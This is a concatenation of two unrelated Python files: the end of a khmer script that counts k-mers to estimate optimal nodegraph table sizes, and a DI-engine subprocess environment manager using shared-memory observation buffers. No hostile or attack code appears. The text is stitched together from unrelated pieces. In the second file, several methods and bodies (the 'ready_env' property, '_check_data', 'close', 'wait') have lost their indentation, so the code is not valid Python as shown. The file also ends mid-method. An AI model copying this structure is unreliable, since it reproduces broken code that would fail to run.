# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Contact: khmer-project@idyll.org
# pylint: disable=invalid-name,missing-docstring
"""
Estimate optimal arguments using nodegraph counting.
% python sandbox/optimal_args_nodegraph.py <data1> [ <data2> <...> ]
Use '-h' for parameter help.
"""
from __future__ import print_function
import sys
import math
import threading
import khmer
from khmer.khmer_args import (report_on_config, info, add_threading_args,
build_nodegraph_args)
from khmer.kfile import check_input_files, check_space
from khmer.kfile import check_space
from khmer.khmer_args import graphsize_args_report
def get_parser():
    """Build and return the command-line argument parser for this script."""
    description = ("Load sequences into the compressible "
                   "graph format plus optional tagset.")
    parser = build_nodegraph_args(descr=description)
    add_threading_args(parser)
    parser.add_argument('input_filenames', metavar='input_sequence_filename',
                        nargs='+', help='input FAST[AQ] sequence filename')
    return parser
def main():
    """Count unique k-mers from the input files, estimate the false-positive
    rate and write a report of optimal graph arguments to ``<base>.optimal_args``.

    Exits with status 1 when the graph structure is too small for the data set.
    """
    info('optimal_args_nodegraph.py', ['graph', 'SeqAn'])
    args = get_parser().parse_args()
    report_on_config(args, graphtype='nodegraph')

    filenames = args.input_filenames
    base = filenames[0]
    for _ in args.input_filenames:
        check_input_files(_, False)
    check_space(args.input_filenames, False)

    print('Counting kmers from sequences in %s' % repr(filenames),
          file=sys.stderr)

    htable = khmer.new_nodegraph(args.ksize, args.max_tablesize, args.n_tables)
    target_method = htable.consume_seqfile_with_reads_parser

    for filename in filenames:
        rparser = khmer.ReadParser(filename)
        threads = []
        print('consuming input', filename, file=sys.stderr)
        # BUG FIX: the original used Python 2's xrange(), which is a NameError
        # on Python 3; range() works on both.
        for _ in range(args.threads):
            cur_thread = threading.Thread(
                target=target_method, args=(rparser,))
            threads.append(cur_thread)
            cur_thread.start()
        for thread in threads:
            thread.join()

    unique_kmers = htable.n_unique_kmers()
    print('Total number of unique k-mers: {0}'.format(unique_kmers),
          file=sys.stderr)

    fp_rate = khmer.calc_expected_collisions(htable)
    print('fp rate estimated to be %1.3f' % fp_rate, file=sys.stderr)
    if fp_rate > 0.15:  # 0.18 is ACTUAL MAX. Do not change.
        print("**", file=sys.stderr)
        print("** ERROR: the graph structure is too small for this data set."
              "Increase table size/# tables.", file=sys.stderr)
        print("**", file=sys.stderr)
        # The original wrapped this in the always-true guard `if not False:`.
        sys.exit(1)

    # Use a context manager so the report file is flushed and closed reliably
    # (the original file handle was never closed).
    with open(base + '.optimal_args', 'w') as info_optimal:
        to_print = graphsize_args_report(unique_kmers, fp_rate)
        print(to_print, file=info_optimal)
    print('optimal arguments were written to', base + '.optimal_args',
          file=sys.stderr)
# Script entry point.
if __name__ == '__main__':
    main()
# vim: set filetype=python tabstop=4 softtabstop=4 shiftwidth=4 expandtab:
# vim: set textwidth=79:
|
subprocess_env_manager.py | from typing import Any, Union, List, Tuple, Dict, Callable, Optional
from multiprocessing import Pipe, connection, get_context, Array
from collections import namedtuple
import logging
import platform
import time
import copy
import traceback
import numpy as np
import torch
import ctypes
import pickle
import cloudpickle
from easydict import EasyDict
from types import MethodType
from ding.utils import PropagatingThread, LockContextType, LockContext, ENV_MANAGER_REGISTRY
from .base_env_manager import BaseEnvManager, EnvState, retry_wrapper, timeout_wrapper
# Mapping from numpy scalar types to the matching ctypes type, used to size the
# shared-memory Array that backs a ShmBuffer.
_NTYPE_TO_CTYPE = {
    np.bool_: ctypes.c_bool,
    np.uint8: ctypes.c_uint8,
    np.uint16: ctypes.c_uint16,
    np.uint32: ctypes.c_uint32,
    np.uint64: ctypes.c_uint64,
    np.int8: ctypes.c_int8,
    np.int16: ctypes.c_int16,
    np.int32: ctypes.c_int32,
    np.int64: ctypes.c_int64,
    np.float32: ctypes.c_float,
    np.float64: ctypes.c_double,
}


class ShmBuffer():
    """
    Overview:
        Shared memory buffer to store numpy array.
    """

    def __init__(self, dtype: np.generic, shape: Tuple[int]) -> None:
        """
        Overview:
            Initialize the buffer.
        Arguments:
            - dtype (:obj:`np.generic`): dtype of the data to limit the size of the buffer.
            - shape (:obj:`Tuple[int]`): shape of the data to limit the size of the buffer.
        """
        # multiprocessing.Array allocates the flat shared-memory block plus a lock.
        self.buffer = Array(_NTYPE_TO_CTYPE[dtype.type], int(np.prod(shape)))
        self.dtype = dtype
        self.shape = shape

    def fill(self, src_arr: np.ndarray) -> None:
        """
        Overview:
            Fill the shared memory buffer with a numpy array. (Replace the original one.)
        Arguments:
            - src_arr (:obj:`np.ndarray`): array to fill the buffer.
        """
        assert isinstance(src_arr, np.ndarray), type(src_arr)
        # frombuffer creates a zero-copy view over the shared block.
        dst_arr = np.frombuffer(self.buffer.get_obj(), dtype=self.dtype).reshape(self.shape)
        with self.buffer.get_lock():
            np.copyto(dst_arr, src_arr)

    def get(self) -> np.ndarray:
        """
        Overview:
            Get the array stored in the buffer.
        Return:
            - copy_data (:obj:`np.ndarray`): A copy of the data stored in the buffer.
        """
        # BUG FIX: copy while holding the Array's lock. The original read without
        # the lock, so a concurrent fill() from another process could produce a
        # torn (half-updated) copy.
        with self.buffer.get_lock():
            arr = np.frombuffer(self.buffer.get_obj(), dtype=self.dtype).reshape(self.shape)
            return arr.copy()
class ShmBufferContainer(object):
    """
    Overview:
        A container of one or many shared-memory buffers; for a dict shape each
        key maps to its own nested container/buffer.
    """

    def __init__(self, dtype: np.generic, shape: Union[Dict[Any, tuple], tuple]) -> None:
        """
        Overview:
            Build the container: a dict shape yields one nested container per
            key, a tuple/list shape yields a single ShmBuffer leaf.
        Arguments:
            - dtype (:obj:`np.generic`): dtype of the stored data.
            - shape (:obj:`Union[Dict[Any, tuple], tuple]`): layout description.
        """
        if isinstance(shape, dict):
            self._data = {key: ShmBufferContainer(dtype, sub_shape) for key, sub_shape in shape.items()}
        elif isinstance(shape, (tuple, list)):
            self._data = ShmBuffer(dtype, shape)
        else:
            raise RuntimeError("not support shape: {}".format(shape))
        self._shape = shape

    def fill(self, src_arr: Union[Dict[Any, np.ndarray], np.ndarray]) -> None:
        """
        Overview:
            Write one array (or a dict of arrays) into the underlying buffer(s).
        Arguments:
            - src_arr (:obj:`Union[Dict[Any, np.ndarray], np.ndarray]`): data to store.
        """
        if isinstance(self._shape, dict):
            for key in self._shape:
                self._data[key].fill(src_arr[key])
        elif isinstance(self._shape, (tuple, list)):
            self._data.fill(src_arr)

    def get(self) -> Union[Dict[Any, np.ndarray], np.ndarray]:
        """
        Overview:
            Read back a copy of the stored array (or dict of arrays).
        Return:
            - data (:obj:`np.ndarray`): copy of the buffered data.
        """
        if isinstance(self._shape, dict):
            return {key: self._data[key].get() for key in self._shape}
        elif isinstance(self._shape, (tuple, list)):
            return self._data.get()
class CloudPickleWrapper:
    """
    Overview:
        CloudPickleWrapper can be able to pickle more python object(e.g: an object with lambda expression)
    """

    def __init__(self, data: Any) -> None:
        # Arbitrary payload to be transported across process boundaries.
        self.data = data

    def __getstate__(self) -> bytes:
        # Serialize with cloudpickle so closures/lambdas survive pickling.
        return cloudpickle.dumps(self.data)

    def __setstate__(self, data: bytes) -> None:
        # NOTE(review): __getstate__ always produces bytes, so this isinstance
        # check on tuple/list/ndarray never matches for round-trips of this
        # class — presumably kept for payloads produced elsewhere; confirm
        # before simplifying.
        if isinstance(data, (tuple, list, np.ndarray)):  # pickle is faster
            self.data = pickle.loads(data)
        else:
            self.data = cloudpickle.loads(data)
@ENV_MANAGER_REGISTRY.register('async_subprocess')
class AsyncSubprocessEnvManager(BaseEnvManager):
    """
    Overview:
        Create an AsyncSubprocessEnvManager to manage multiple environments.
        Each Environment is run by a respective subprocess.
    Interfaces:
        seed, launch, ready_obs, step, reset, env_info, active_env
    """

    config = dict(
        episode_num=float("inf"),
        max_retry=5,
        step_timeout=60,
        auto_reset=True,
        reset_timeout=60,
        retry_waiting_time=0.1,
        # subprocess specified args
        shared_memory=True,
        # 'fork' is unavailable on Windows, so fall back to 'spawn' there.
        context='spawn' if platform.system().lower() == 'windows' else 'fork',
        wait_num=2,
        step_wait_timeout=0.01,
        connect_timeout=60,
    )

    def __init__(
            self,
            env_fn: List[Callable],
            cfg: EasyDict = EasyDict({}),
    ) -> None:
        """
        Overview:
            Initialize the AsyncSubprocessEnvManager.
        Arguments:
            - env_fn (:obj:`List[Callable]`): The function to create environment
            - cfg (:obj:`EasyDict`): Config
        """
        super().__init__(env_fn, cfg)
        self._shared_memory = self._cfg.shared_memory
        self._context = self._cfg.context
        self._wait_num = self._cfg.wait_num
        self._step_wait_timeout = self._cfg.step_wait_timeout
        self._lock = LockContext(LockContextType.THREAD_LOCK)
        self._connect_timeout = self._cfg.connect_timeout
        # Never let the pipe-connect timeout be shorter than a single step/reset
        # plus a small margin (_step_timeout/_reset_timeout come from the base
        # class — confirm against BaseEnvManager).
        self._connect_timeout = np.max([self._connect_timeout, self._step_timeout + 0.5, self._reset_timeout + 0.5])
    def _create_state(self) -> None:
        r"""
        Overview:
            Fork/spawn sub-processes(Call ``_create_env_subprocess``) and create pipes to transfer the data.
        """
        self._env_episode_count = {env_id: 0 for env_id in range(self.env_num)}
        self._ready_obs = {env_id: None for env_id in range(self.env_num)}
        # Reference env instance kept in the main process; used for attribute
        # lookup (__getattr__) and for querying the observation space below.
        self._env_ref = self._env_fn[0]()
        self._reset_param = {i: {} for i in range(self.env_num)}
        if self._shared_memory:
            obs_space = self._env_ref.info().obs_space
            shape = obs_space.shape
            # Fall back to float32 when the space does not declare a dtype.
            dtype = np.dtype(obs_space.value['dtype']) if obs_space.value is not None else np.dtype(np.float32)
            self._obs_buffers = {env_id: ShmBufferContainer(dtype, shape) for env_id in range(self.env_num)}
        else:
            self._obs_buffers = {env_id: None for env_id in range(self.env_num)}
        self._pipe_parents, self._pipe_children = {}, {}
        self._subprocesses = {}
        for env_id in range(self.env_num):
            self._create_env_subprocess(env_id)
        self._waiting_env = {'step': set()}
        self._setup_async_args()
        self._closed = False
    def _create_env_subprocess(self, env_id):
        # Start (or restart, after a timeout kill) the worker subprocess for one
        # environment and wire up its pipe endpoints.
        self._pipe_parents[env_id], self._pipe_children[env_id] = Pipe()
        ctx = get_context(self._context)
        self._subprocesses[env_id] = ctx.Process(
            # target=self.worker_fn,
            target=self.worker_fn_robust,
            args=(
                self._pipe_parents[env_id],
                self._pipe_children[env_id],
                CloudPickleWrapper(self._env_fn[env_id]),
                self._obs_buffers[env_id],
                self.method_name_list,
                self._reset_timeout,
                self._step_timeout,
                self._max_retry,
            ),
            daemon=True,
            name='subprocess_env_manager{}_{}'.format(env_id, time.time())
        )
        self._subprocesses[env_id].start()
        # The child end is only used inside the subprocess; close our copy so
        # EOF propagates correctly when the child exits.
        self._pipe_children[env_id].close()
        self._env_states[env_id] = EnvState.INIT
        if self._env_replay_path is not None:
            self._pipe_parents[env_id].send(['enable_save_replay', [self._env_replay_path[env_id]], {}])
            self._pipe_parents[env_id].recv()
    def _setup_async_args(self) -> None:
        r"""
        Overview:
            Set up the async arguments utilized in method ``step``.

        .. note::
            - wait_num: for each time the minimum number of env return to gather
            - timeout: how long ``wait`` may keep gathering (seconds) before \
              returning the already-ready subset (the original note here was a \
              copy-paste of wait_num's description)
        """
        self._async_args = {
            'step': {
                'mode': 'async',
                'wait_num': self._wait_num,
                'timeout': self._step_wait_timeout
            },
        }
@property
def ready_env(self) -> List[int]:
return [i for i in self.active_env if i not in self._waiting_env['step']]
    @property
    def ready_obs(self) -> Dict[int, Any]:
        """
        Overview:
            Get the next observations.
        Return:
            A dictionary with observations and their environment IDs.
        Note:
            The observations are returned in np.ndarray.
        Example:
            >>> obs_dict = env_manager.ready_obs
            >>> actions_dict = {env_id: model.forward(obs) for env_id, obs in obs_dict.items())}
        """
        no_done_env_idx = [i for i, s in self._env_states.items() if s != EnvState.DONE]
        sleep_count = 0
        # Busy-wait (1 ms sleeps) until at least one not-done env has finished
        # resetting and is in the RUN state; warn every ~1 s.
        while not any([self._env_states[i] == EnvState.RUN for i in no_done_env_idx]):
            if sleep_count % 1000 == 0:
                logging.warning(
                    'VEC_ENV_MANAGER: all the not done envs are resetting, sleep {} times'.format(sleep_count)
                )
            time.sleep(0.001)
            sleep_count += 1
        return {i: self._ready_obs[i] for i in self.ready_env}
    def launch(self, reset_param: Optional[Dict] = None) -> None:
        """
        Overview:
            Set up the environments and their parameters.
        Arguments:
            - reset_param (:obj:`Optional[Dict]`): Dict of reset parameters for each environment, key is the env_id, \
                value is the corresponding reset parameters.
        """
        # The manager starts life closed; launching twice without close() is an error.
        assert self._closed, "please first close the env manager"
        if reset_param is not None:
            assert len(reset_param) == len(self._env_fn)
        self._create_state()
        self.reset(reset_param)
    def reset(self, reset_param: Optional[Dict] = None) -> None:
        """
        Overview:
            Reset the environments and their parameters.
        Arguments:
            - reset_param (:obj:`List`): Dict of reset parameters for each environment, key is the env_id, \
                value is the corresponding reset parameters.
        """
        self._check_closed()
        # clear previous info
        for env_id in self._waiting_env['step']:
            self._pipe_parents[env_id].recv()
        self._waiting_env['step'].clear()
        if reset_param is None:
            reset_env_list = [env_id for env_id in range(self._env_num)]
        else:
            reset_env_list = reset_param.keys()
            for env_id in reset_param:
                self._reset_param[env_id] = reset_param[env_id]
        sleep_count = 0
        # Wait until none of the target envs is still busy with a previous reset.
        while any([self._env_states[i] == EnvState.RESET for i in reset_env_list]):
            if sleep_count % 1000 == 0:
                logging.warning(
                    'VEC_ENV_MANAGER: not all the envs finish resetting, sleep {} times'.format(sleep_count)
                )
            time.sleep(0.001)
            sleep_count += 1
        # reset env
        reset_thread_list = []
        for i, env_id in enumerate(reset_env_list):
            self._env_states[env_id] = EnvState.RESET
            # set seed
            if self._env_seed[env_id] is not None:
                try:
                    if self._env_dynamic_seed is not None:
                        self._pipe_parents[env_id].send(['seed', [self._env_seed[env_id], self._env_dynamic_seed], {}])
                    else:
                        self._pipe_parents[env_id].send(['seed', [self._env_seed[env_id]], {}])
                    ret = self._pipe_parents[env_id].recv()
                    self._check_data({env_id: ret})
                    self._env_seed[env_id] = None  # seed only use once
                except Exception as e:
                    # Seeding failure is not fatal; the env is still reset below.
                    logging.warning("subprocess reset set seed failed, ignore and continue...")
            # One thread per env so all resets proceed concurrently; a
            # PropagatingThread re-raises worker exceptions in join().
            reset_thread = PropagatingThread(target=self._reset, args=(env_id, ))
            reset_thread.daemon = True
            reset_thread_list.append(reset_thread)
        for t in reset_thread_list:
            t.start()
        for t in reset_thread_list:
            t.join()
    def _reset(self, env_id: int) -> None:
        # Reset one environment inside its worker subprocess; runs in a
        # dedicated thread so multiple envs can reset concurrently.

        @retry_wrapper(max_retry=self._max_retry, waiting_time=self._retry_waiting_time)
        def reset_fn():
            # A pending message here means a previous command was never read;
            # surface that instead of silently desynchronizing the pipe.
            if self._pipe_parents[env_id].poll():
                recv_data = self._pipe_parents[env_id].recv()
                raise Exception("unread data left before sending to the pipe: {}".format(repr(recv_data)))
            # if self._reset_param[env_id] is None, just reset specific env, not pass reset param
            if self._reset_param[env_id] is not None:
                assert isinstance(self._reset_param[env_id], dict), type(self._reset_param[env_id])
                self._pipe_parents[env_id].send(['reset', [], self._reset_param[env_id]])
            else:
                self._pipe_parents[env_id].send(['reset', [], {}])
            if not self._pipe_parents[env_id].poll(self._connect_timeout):
                # terminate the old subprocess
                self._pipe_parents[env_id].close()
                if self._subprocesses[env_id].is_alive():
                    self._subprocesses[env_id].terminate()
                # reset the subprocess
                self._create_env_subprocess(env_id)
                raise Exception("env reset timeout")  # Leave it to retry_wrapper to try again
            obs = self._pipe_parents[env_id].recv()
            self._check_data({env_id: obs}, close=False)
            if self._shared_memory:
                # The worker put the real observation in shared memory and sent None.
                obs = self._obs_buffers[env_id].get()
            # Because each thread updates the corresponding env_id value, they won't lead to a thread-safe problem.
            self._env_states[env_id] = EnvState.RUN
            self._ready_obs[env_id] = obs

        try:
            reset_fn()
        except Exception as e:
            logging.error('VEC_ENV_MANAGER: env {} reset error'.format(env_id))
            logging.error('\nEnv Process Reset Exception:\n' + ''.join(traceback.format_tb(e.__traceback__)) + repr(e))
            if self._closed:  # exception cased by main thread closing parent_remote
                return
            else:
                self.close()
                raise e
    def step(self, actions: Dict[int, Any]) -> Dict[int, namedtuple]:
        """
        Overview:
            Step all environments. Reset an env if done.
        Arguments:
            - actions (:obj:`Dict[int, Any]`): {env_id: action}
        Returns:
            - timesteps (:obj:`Dict[int, namedtuple]`): {env_id: timestep}. Timestep is a \
                ``BaseEnvTimestep`` tuple with observation, reward, done, env_info.
        Example:
            >>> actions_dict = {env_id: model.forward(obs) for env_id, obs in obs_dict.items())}
            >>> timesteps = env_manager.step(actions_dict):
            >>> for env_id, timestep in timesteps.items():
            >>>     pass

        .. note::

            - The env_id that appears in ``actions`` will also be returned in ``timesteps``.
            - Each environment is run by a subprocess separately. Once an environment is done, it is reset immediately.
            - Async subprocess env manager use ``connection.wait`` to poll.
        """
        self._check_closed()
        env_ids = list(actions.keys())
        assert all([self._env_states[env_id] == EnvState.RUN for env_id in env_ids]
                   ), 'current env state are: {}, please check whether the requested env is in reset or done'.format(
                       {env_id: self._env_states[env_id]
                        for env_id in env_ids}
                   )
        for env_id, act in actions.items():
            self._pipe_parents[env_id].send(['step', [act], {}])

        timesteps = {}
        step_args = self._async_args['step']
        wait_num, timeout = min(step_args['wait_num'], len(env_ids)), step_args['timeout']
        # Poll both the envs stepped just now and those still pending from a
        # previous call (async mode can leave envs waiting across calls).
        rest_env_ids = list(set(env_ids).union(self._waiting_env['step']))
        ready_env_ids = []
        cur_rest_env_ids = copy.deepcopy(rest_env_ids)
        while True:
            rest_conn = [self._pipe_parents[env_id] for env_id in cur_rest_env_ids]
            ready_conn, ready_ids = AsyncSubprocessEnvManager.wait(rest_conn, min(wait_num, len(rest_conn)), timeout)
            cur_ready_env_ids = [cur_rest_env_ids[env_id] for env_id in ready_ids]
            assert len(cur_ready_env_ids) == len(ready_conn)
            timesteps.update({env_id: p.recv() for env_id, p in zip(cur_ready_env_ids, ready_conn)})
            self._check_data(timesteps)
            ready_env_ids += cur_ready_env_ids
            cur_rest_env_ids = list(set(cur_rest_env_ids).difference(set(cur_ready_env_ids)))
            # At least one not done env timestep, or all envs' steps are finished
            if any([not t.done for t in timesteps.values()]) or len(ready_conn) == len(rest_conn):
                break

        # Book-keeping: envs that did not answer this round stay in the waiting
        # set; answered envs leave it.
        self._waiting_env['step']: set
        for env_id in rest_env_ids:
            if env_id in ready_env_ids:
                if env_id in self._waiting_env['step']:
                    self._waiting_env['step'].remove(env_id)
            else:
                self._waiting_env['step'].add(env_id)

        if self._shared_memory:
            # Re-attach the real observations (workers send obs=None and put the
            # data in the shared-memory buffers).
            for i, (env_id, timestep) in enumerate(timesteps.items()):
                timesteps[env_id] = timestep._replace(obs=self._obs_buffers[env_id].get())

        for env_id, timestep in timesteps.items():
            if timestep.info.get('abnormal', False):
                self._env_states[env_id] = EnvState.ERROR
                continue
            if timestep.done:
                self._env_episode_count[env_id] += 1
                if self._env_episode_count[env_id] < self._episode_num and self._auto_reset:
                    self._env_states[env_id] = EnvState.RESET
                    reset_thread = PropagatingThread(target=self._reset, args=(env_id, ), name='regular_reset')
                    reset_thread.daemon = True
                    reset_thread.start()
                else:
                    self._env_states[env_id] = EnvState.DONE
            else:
                self._ready_obs[env_id] = timestep.obs
        return timesteps
    # This method must be staticmethod, otherwise there will be some resource conflicts(e.g. port or file)
    # Env must be created in worker, which is a trick of avoiding env pickle errors.
    # A more robust version is used by default. But this one is also preserved.
    @staticmethod
    def worker_fn(
            p: connection.Connection, c: connection.Connection, env_fn_wrapper: 'CloudPickleWrapper',
            obs_buffer: ShmBuffer, method_name_list: list
    ) -> None:  # noqa
        """
        Overview:
            Subprocess's target function to run.
        """
        torch.set_num_threads(1)
        env_fn = env_fn_wrapper.data
        env = env_fn()
        # The parent end belongs to the main process; close our copy.
        p.close()
        try:
            while True:
                try:
                    cmd, args, kwargs = c.recv()
                except EOFError:  # for the case when the pipe has been closed
                    c.close()
                    break
                try:
                    if cmd == 'getattr':
                        ret = getattr(env, args[0])
                    elif cmd in method_name_list:
                        if cmd == 'step':
                            timestep = env.step(*args, **kwargs)
                            if timestep.info.get('abnormal', False):
                                ret = timestep
                            else:
                                if obs_buffer is not None:
                                    # Ship the observation via shared memory and
                                    # strip it from the pipe payload.
                                    obs_buffer.fill(timestep.obs)
                                    timestep = timestep._replace(obs=None)
                                ret = timestep
                        elif cmd == 'reset':
                            ret = env.reset(*args, **kwargs)  # obs
                            if obs_buffer is not None:
                                obs_buffer.fill(ret)
                                ret = None
                        elif args is None and kwargs is None:
                            ret = getattr(env, cmd)()
                        else:
                            ret = getattr(env, cmd)(*args, **kwargs)
                    else:
                        raise KeyError("not support env cmd: {}".format(cmd))
                    c.send(ret)
                except Exception as e:
                    # when there are some errors in env, worker_fn will send the errors to env manager
                    # directly send error to another process will lose the stack trace, so we create a new Exception
                    c.send(
                        e.__class__(
                            '\nEnv Process Exception:\n' + ''.join(traceback.format_tb(e.__traceback__)) + repr(e)
                        )
                    )
                if cmd == 'close':
                    c.close()
                    break
        except KeyboardInterrupt:
            c.close()
    @staticmethod
    def worker_fn_robust(
            parent,
            child,
            env_fn_wrapper,
            obs_buffer,
            method_name_list,
            reset_timeout=60,
            step_timeout=60,
            max_retry=1
    ) -> None:
        """
        Overview:
            A more robust version of subprocess's target function to run. Used by default.
        """
        torch.set_num_threads(1)
        env_fn = env_fn_wrapper.data
        env = env_fn()
        # The parent end belongs to the main process; close our copy.
        parent.close()

        # Step with both a per-call timeout and retries.
        @retry_wrapper(max_retry=max_retry)
        @timeout_wrapper(timeout=step_timeout)
        def step_fn(*args, **kwargs):
            timestep = env.step(*args, **kwargs)
            if timestep.info.get('abnormal', False):
                ret = timestep
            else:
                if obs_buffer is not None:
                    # Ship the observation via shared memory; send obs=None on the pipe.
                    obs_buffer.fill(timestep.obs)
                    timestep = timestep._replace(obs=None)
                ret = timestep
            return ret

        # self._reset method has add retry_wrapper decorator
        @timeout_wrapper(timeout=reset_timeout)
        def reset_fn(*args, **kwargs):
            try:
                ret = env.reset(*args, **kwargs)
                if obs_buffer is not None:
                    obs_buffer.fill(ret)
                    ret = None
                return ret
            except Exception as e:
                # A failed reset leaves the env in an unknown state; close it
                # before propagating so resources are not leaked.
                env.close()
                raise e

        while True:
            try:
                cmd, args, kwargs = child.recv()
            except EOFError:  # for the case when the pipe has been closed
                child.close()
                break
            try:
                if cmd == 'getattr':
                    ret = getattr(env, args[0])
                elif cmd in method_name_list:
                    if cmd == 'step':
                        ret = step_fn(*args, **kwargs)
                    elif cmd == 'reset':
                        ret = reset_fn(*args, **kwargs)
                    elif args is None and kwargs is None:
                        ret = getattr(env, cmd)()
                    else:
                        ret = getattr(env, cmd)(*args, **kwargs)
                else:
                    raise KeyError("not support env cmd: {}".format(cmd))
                child.send(ret)
            except Exception as e:
                # print("Sub env '{}' error when executing {}".format(str(env), cmd))
                # when there are some errors in env, worker_fn will send the errors to env manager
                # directly send error to another process will lose the stack trace, so we create a new Exception
                child.send(
                    e.__class__('\nEnv Process Exception:\n' + ''.join(traceback.format_tb(e.__traceback__)) + repr(e))
                )
            if cmd == 'close':
                child.close()
                break
def _check_data(self, data: Dict, close: bool = True) -> None:
exceptions = []
for i, d in data.items():
if isinstance(d, Exception):
self._env_states[i] = EnvState.ERROR
exceptions.append(d)
# when receiving env Exception, env manager will safely close and raise this Exception to caller
if len(exceptions) > 0:
if close:
self.close()
raise exceptions[0]
    # override
    def __getattr__(self, key: str) -> Any:
        # Fan an attribute read out to every env subprocess and return the
        # collected values as a list (one entry per env, in pipe-dict order).
        self._check_closed()
        # we suppose that all the envs has the same attributes, if you need different envs, please
        # create different env managers.
        if not hasattr(self._env_ref, key):
            raise AttributeError("env `{}` doesn't have the attribute `{}`".format(type(self._env_ref), key))
        if isinstance(getattr(self._env_ref, key), MethodType) and key not in self.method_name_list:
            raise RuntimeError("env getattr doesn't supports method({}), please override method_name_list".format(key))
        for _, p in self._pipe_parents.items():
            p.send(['getattr', [key], {}])
        data = {i: p.recv() for i, p in self._pipe_parents.items()}
        self._check_data(data)
        ret = [data[i] for i in self._pipe_parents.keys()]
        return ret
# override
def enable_save_replay(self, replay_path: Union[List[str], str]) -> None:
    """
    Overview:
        Set the replay save path for each environment.
    Arguments:
        - replay_path (:obj:`Union[List[str], str]`): Either one path per \
            environment, or a single path shared by all environments.
    """
    # A single string is fanned out to every env; a list is used as given.
    if isinstance(replay_path, str):
        paths = [replay_path] * self.env_num
    else:
        paths = replay_path
    self._env_replay_path = paths
# override
def close(self) -> None:
    """
    Overview:
        Close the env manager and release all related resources
        (reference env, worker pipes and subprocesses).
    """
    if self._closed:
        return
    self._closed = True
    self._env_ref.close()
    # Ask every worker to shut down, then drain one acknowledgement per pipe
    # so workers leave their command loops cleanly before termination.
    for _, p in self._pipe_parents.items():
        p.send(['close', None, None])
    for _, p in self._pipe_parents.items():
        p.recv()
    for i in range(self._env_num):
        self._env_states[i] = EnvState.VOID
    # disable process join for avoiding hang
    # for p in self._subprocesses:
    #     p.join()
    for _, p in self._subprocesses.items():
        p.terminate()
    for _, p in self._pipe_parents.items():
        p.close()
@staticmethod
def wait(rest_conn: list, wait_num: int, timeout: Optional[float] = None) -> Tuple[list, list]:
    """
    Overview:
        Wait until at least ``wait_num`` connections out of ``rest_conn`` are ready,
        subject to the timeout constraint.
        If timeout is None and wait_num == len(ready_conn), this is sync mode;
        If timeout is not None, return when len(ready_conn) >= wait_num and
        this method has taken more than timeout seconds.
    Returns:
        - ready connections, and their indices in the original ``rest_conn`` list.
    """
    assert 1 <= wait_num <= len(rest_conn), \
        'please indicate proper wait_num: <wait_num: {}, rest_conn_num: {}>'.format(wait_num, len(rest_conn))
    rest_conn_set = set(rest_conn)
    ready_conn = set()
    start_time = time.time()
    while len(rest_conn_set) > 0:
        # Once enough connections are ready AND a timeout is set, only keep
        # waiting until the overall deadline has elapsed.
        if len(ready_conn) >= wait_num and timeout:
            if (time.time() - start_time) >= timeout:
                break
        # presumably `connection` is multiprocessing.connection (imported at
        # file top, outside this view) — its wait() blocks until readable.
        finish_conn = set(connection.wait(rest_conn_set, timeout=timeout))
        ready_conn = ready_conn.union(finish_conn)
        rest_conn_set = rest_conn_set.difference(finish_conn)
    # NOTE(review): iteration order of the `ready_conn` set is unspecified, so
    # the pairing between the returned list and ready_ids is consistent within
    # one call, but not sorted — callers must use ready_ids for identity.
    ready_ids = [rest_conn.index(c) for c in ready_conn]
    return list(ready_conn), ready_ids
@ENV_MANAGER_REGISTRY.register('subprocess')
class SyncSubprocessEnvManager(AsyncSubprocessEnvManager):
    """Subprocess env manager that steps all requested envs synchronously."""

    def _setup_async_args(self) -> None:
        # Sync mode: each step waits for every requested env, with no timeout.
        self._async_args = {
            'step': {
                'mode': 'sync',
                'wait_num': self._env_num,  # math.inf,
                'timeout': None,
            },
        }

    def step(self, actions: Dict[int, Any]) -> Dict[int, namedtuple]:
        """
        Overview:
            Step all environments. Reset an env if done.
        Arguments:
            - actions (:obj:`Dict[int, Any]`): {env_id: action}
        Returns:
            - timesteps (:obj:`Dict[int, namedtuple]`): {env_id: timestep}. Timestep is a \
                ``BaseEnvTimestep`` tuple with observation, reward, done, env_info.
        Example:
            >>> actions_dict = {env_id: model.forward(obs) for env_id, obs in obs_dict.items()}
            >>> timesteps = env_manager.step(actions_dict)
            >>> for env_id, timestep in timesteps.items():
            >>>     pass
        .. note::
            - The env_id that appears in ``actions`` will also be returned in ``timesteps``.
            - Each environment is run by a subprocess separately. Once an environment is done, it is reset immediately.
        """
        self._check_closed()
        env_ids = list(actions.keys())
        assert all([self._env_states[env_id] == EnvState.RUN for env_id in env_ids]), \
            'current env state are: {}, please check whether the requested env is in reset or done'.format(
                {env_id: self._env_states[env_id] for env_id in env_ids}
            )
        for env_id, act in actions.items():
            self._pipe_parents[env_id].send(['step', [act], {}])
        # === This part is different from async one. ===
        # === Because operate in this way is more efficient. ===
        timesteps = {}
        ready_conn = [self._pipe_parents[env_id] for env_id in env_ids]
        timesteps.update({env_id: p.recv() for env_id, p in zip(env_ids, ready_conn)})
        self._check_data(timesteps)
        # ======================================================
        if self._shared_memory:
            # Observations travel through shared-memory buffers; substitute the
            # placeholder obs in each timestep with the buffer contents.
            for i, (env_id, timestep) in enumerate(timesteps.items()):
                timesteps[env_id] = timestep._replace(obs=self._obs_buffers[env_id].get())
        for env_id, timestep in timesteps.items():
            if timestep.info.get('abnormal', False):
                self._env_states[env_id] = EnvState.ERROR
                continue
            if timestep.done:
                self._env_episode_count[env_id] += 1
                if self._env_episode_count[env_id] < self._episode_num and self._auto_reset:
                    # Reset in a background thread so other envs are not blocked.
                    self._env_states[env_id] = EnvState.RESET
                    reset_thread = PropagatingThread(target=self._reset, args=(env_id, ), name='regular_reset')
                    reset_thread.daemon = True
                    reset_thread.start()
                else:
                    self._env_states[env_id] = EnvState.DONE
            else:
